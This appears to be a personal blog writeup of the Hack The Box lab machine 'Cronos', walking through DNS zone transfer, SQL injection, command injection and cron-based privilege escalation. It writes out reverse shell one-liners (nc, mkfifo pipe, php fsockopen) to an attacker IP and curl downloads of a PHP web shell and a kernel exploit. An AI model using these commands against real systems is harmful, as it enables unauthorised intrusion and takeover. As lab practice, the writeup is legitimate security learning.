Hack The Box – Cronos – writeup

Cronis is a Linux box which had a few failures before I found a method which worked to get the root password at the end. It was good practise of the “try harder” motto.

Starting with a nmap scan we can see 3 ports open, SSH, DNS and HTTP

cronos1

I like to check if any default admin:admin type passwords work for ssh login to give us an easy start. but no luck.

cronos2

We can then head over to the webpage and see that it looks like a default Apache install.

cronos3

As the default index.html doesn’t seem to be hiding any clues I started a dirbuster scan to find any hidden files/folders but that also comes up empty.

cronos4

The DNS port we found earlier is likely there for a reason, most HTB boxes don’t have it running unless it’s going to help us compromise a box so lets do some enumeration and see what we can find. An NSlookup shows the subdomain ns1.cronos.htb

cronos5

It’s possible that there are multiple other subdomains being used so lets edit the /etc/hosts file, first trying domain cronos.htb

cronos6

If we then re-visit the server with our browser it takes us to a new page. It’s a good sign we’re on the right track but there are no more clues on this page, we’re likely going to have to keep digging with DNS.

cronos7

we can do a zone transfer to see what other information the DNS server throws up. A few more subdomains are mentioned, and anything with “admin” in the name is always worth looking further into.

cronos8

If we add this new domain to the hosts file as before and visit it we get a new login page we can try to attack.

cronos9

Looking at the source code and trying some default admin:admin credentials doesn’t give us anything, but moving onto testing SQL injection does

cronos10

tricking the login page into thinking we’ve been successful with our credentials takes us to this very basic looking page with some pre-built functions which ping and tracert a given IP

cronos11

As the famous web security saying goes “Never trust user input”. Lets see if the developer of this page took that advice and applied some sort of validation/filter to the user input.

cronos12

Nope! We can run a selection of linux commands by adding a ; after the IP address in the input box. This is the time to start looking at getting a shell over to the server. First we setup our nc listener

cronos13

I then tried a few one liners such as :

  • nc -e /bin/sh 10.0.14.23 4444
  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.14.23 4444 >/tmp/f
  • php -r ‘$sock=fsockopen(“10.0.14.23”,4444);exec(“/bin/sh -i <&3 >&3 2>&3”);

but they didn’t work so the next step is to see if we could put a PHP script onto the server. The one I used was the pentestmonkey one available from the URL in this screenshot:

cronos14

Once downloaded you need to enter your port and IP and host it using the built in Kali tool SimpleHTTPserver.

cronos15

It can then be uploaded using this command appended to the IP address on the webpage.

curl -O http://10.10.14.23:8000/dodgyfile.php

cronos16

Manually visiting the new file causes it to run and we get our shell.

cronos17cronos18

A quick browse to the user folder finds the flag in the usual place

cronos19

Next step is to try and upgrade our shell so we can perform a few more actions during enumeration. You can spawn a python shell using:

python -c ‘import pty;pty.spawn(“/bin/bash”);’

then navigate over to /dev/shm in preparation for getting the Linenum.sh script onto it.

cronos20

Linenum is a well known script which performs lots of enumeration functions on Linux systems, saving you time and removing the risk of you forgetting to run something useful. It can be found at : https://github.com/rebootuser/LinEnum

I downloaded it and placed it in my SimpleHTTPServer folder, then ran this on the victim machine to transfer it:

curl -O http://10.10.14.23:8000/linuxenum.sh

Note: you need to chmod +x the script before it will run:

cronos21

The script provides a lot of useful information, starting with basic version info:

cronos22

A few options for different shells if we need them for future attacks

cronos23

And it spots a PHP file running with root privileges. Given that the name of the box is Cronos is a clue that we should be looking at something happening with a cron job.

cronos24

If we visit the artisan file it looks like this job runs the schedule method for a program called Laravel artisan. The schedule method however isn’t inside the artisan file. But if we look at google for it we eventually find a reference to where it might be:

cronos25

We can confirm it’s there:

cronos26

The Kernel file allows us to edit it and add our own lines into the schedule method. If this runs as root then in theory we have pwned the system. I tried to execute a cat command to transfer the contents of the root.txt file into a file I had access to:

cronos27

This created the new root.txt file but for some reason didn’t copy the contents of the original file, so lets try changing the permissions to just allow us to browse to it manually.

cronos28

Once again the task ran but didn’t work as expected. There is always more than one way to complete these challenges so after playing with the Kernel.php file for a bit longer I went back to my enumeration and tried looking for other privilege escalation exploits for this version of Linux.

The first one that came up was :https://www.exploit-db.com/exploits/44298

which we can download and compile using:

gcc -o file 44298.c

cronos29

We can transfer it over to the victim machine using SimpleHTTPServer as before and running it works first time to give us root access.

cronos30

The flag is in the root folder.